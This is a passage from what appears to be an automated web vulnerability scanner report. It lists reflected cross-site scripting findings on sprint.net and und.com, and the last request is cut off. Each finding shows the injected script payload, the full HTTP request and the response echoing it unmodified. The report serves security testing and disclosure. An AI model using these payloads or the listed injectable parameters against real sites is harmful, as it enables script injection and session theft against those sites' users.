Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/min27e50"><script>alert(1)</script>d3106908dc/" />
...[SNIP]...

5.85. https://www.sprint.net/performance [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7db"><script>alert(1)</script>ec756d68c15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance3d7db"><script>alert(1)</script>ec756d68c15 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:11 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance3d7db"><script>alert(1)</script>ec756d68c15" />
...[SNIP]...

5.86. https://www.sprint.net/performance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe549"><script>alert(1)</script>958e28ceb0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performancefe549"><script>alert(1)</script>958e28ceb0d/ HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1124; path=/
Date: Sun, 04 Sep 2011 00:48:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performancefe549"><script>alert(1)</script>958e28ceb0d/" />
...[SNIP]...

5.87. https://www.sprint.net/performance/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d08e2"><script>alert(1)</script>a80de0e0c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/?d08e2"><script>alert(1)</script>a80de0e0c3d=1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/?d08e2"><script>alert(1)</script>a80de0e0c3d=1" />
...[SNIP]...

5.88. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_line_xml.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c9e"><script>alert(1)</script>ad88d874842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance33c9e"><script>alert(1)</script>ad88d874842/gen_line_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance33c9e"><script>alert(1)</script>ad88d874842/gen_line_xml.php" />
...[SNIP]...

5.89. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_line_xml.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8338f"><script>alert(1)</script>13d9de34be1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/gen_line_xml.php8338f"><script>alert(1)</script>13d9de34be1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/gen_line_xml.php8338f"><script>alert(1)</script>13d9de34be1" />
...[SNIP]...

5.90. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_pop_xml.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90061"><script>alert(1)</script>413bc0303e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance90061"><script>alert(1)</script>413bc0303e6/gen_pop_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:37 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance90061"><script>alert(1)</script>413bc0303e6/gen_pop_xml.php" />
...[SNIP]...

5.91. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_pop_xml.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c64e"><script>alert(1)</script>2f160f05d4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/gen_pop_xml.php7c64e"><script>alert(1)</script>2f160f05d4b HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:49 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/gen_pop_xml.php7c64e"><script>alert(1)</script>2f160f05d4b" />
...[SNIP]...

5.92. https://www.sprint.net/performance/performance.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/performance.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 380b8"><script>alert(1)</script>0c607eb5845 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance380b8"><script>alert(1)</script>0c607eb5845/performance.swf HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:31 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance380b8"><script>alert(1)</script>0c607eb5845/performance.swf" />
...[SNIP]...

5.93. https://www.sprint.net/performance/performance.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/performance.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7085b"><script>alert(1)</script>c5bd3f6a3e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/performance.swf7085b"><script>alert(1)</script>c5bd3f6a3e1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:43 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/performance.swf7085b"><script>alert(1)</script>c5bd3f6a3e1" />
...[SNIP]...

5.94. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f73"><script>alert(1)</script>312ccc6a7af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportsb3f73"><script>alert(1)</script>312ccc6a7af/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportsb3f73"><script>alert(1)</script>312ccc6a7af/m-footbl/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.95. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d066e"><script>alert(1)</script>1d9633a65ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbld066e"><script>alert(1)</script>1d9633a65ee/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:51 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbld066e"><script>alert(1)</script>1d9633a65ee/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.96. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c955e"><script>alert(1)</script>dfec6a8d34d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956c955e"><script>alert(1)</script>dfec6a8d34d HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:52 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956c955e"><script>alert(1)</script>dfec6a8d34d','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.97. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ae9"><script>alert(1)</script>fcb6a136b80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956?99ae9"><script>alert(1)</script>fcb6a136b80=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956?99ae9"><script>alert(1)</script>fcb6a136b80=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.98. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b5"><script>alert(1)</script>815941a6815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports9c8b5"><script>alert(1)</script>815941a6815/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:52 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports9c8b5"><script>alert(1)</script>815941a6815/m-footbl/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.99. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c09fe"><script>alert(1)</script>185ebd9758c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footblc09fe"><script>alert(1)</script>185ebd9758c/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:03 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footblc09fe"><script>alert(1)</script>185ebd9758c/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.100. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c242"><script>alert(1)</script>4a7447b872b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/98741344c242"><script>alert(1)</script>4a7447b872b HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
